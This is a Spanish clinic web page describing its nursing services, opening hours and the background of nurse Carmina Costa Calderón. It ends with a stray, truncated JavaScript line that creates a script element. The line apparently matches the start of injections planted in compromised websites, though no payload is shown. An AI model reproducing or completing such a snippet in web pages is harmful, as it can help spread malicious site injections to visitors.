Desde CLINICA LA PAU también ponemos a vuestra disposición un servicio integral de cuidado: la enfermería.

En ocasiones hay personas que confunden el servicio de medicina con el de enfermería, cosa que no debería ser así, ya que, pese a que ambos servicios están muy relacionados, sus funciones son totalmente diferentes.

Entre los servicios de enfermería que podrás encontrar en nuestros especialistas podemos encontrar la toma de la tensión arterial, las curas de heridas y de úlceras, la extracción de muestras sanguíneas, retirada de puntos, realización de electrocardiogramas, puesta de vacunas y otros tipos de inyecciones, realizar audiometrías….

Además de todo esto, la sección de enfermería es la encargada de promover la salud mediante lo que se conoce como educación sanitaria, que haciendo un breve resumen es fomentar una vida saludable mediante el deporte y una correcta alimentación e impulsar el uso de medidas higiénicas adecuadas.

Horario:

  • Mañanas de lunes y miércoles, de 9 a 14 horas.
  • Tardes de martes, miércoles, jueves y viernes  de 16 a 20 horas.

 

CARMINA COSTA CALDERÓN

CARMINA COSTA CALDERÓN

  • Enfermería
  • Diplomada Universitaria en Enfermería.
  • Nacida en Valencia, cursó estudios universitarios en la Escuela Universitaria de Enfermería de Valencia donde adquirió el título de Diplomada Universitaria en Enfermería en el año 2007. Desde entonces, ha ejercido su labor como profesional de esta especialidad en diferentes centros públicos de la provincia de Valencia.



var d=document;var s=d.createElement(‘script’);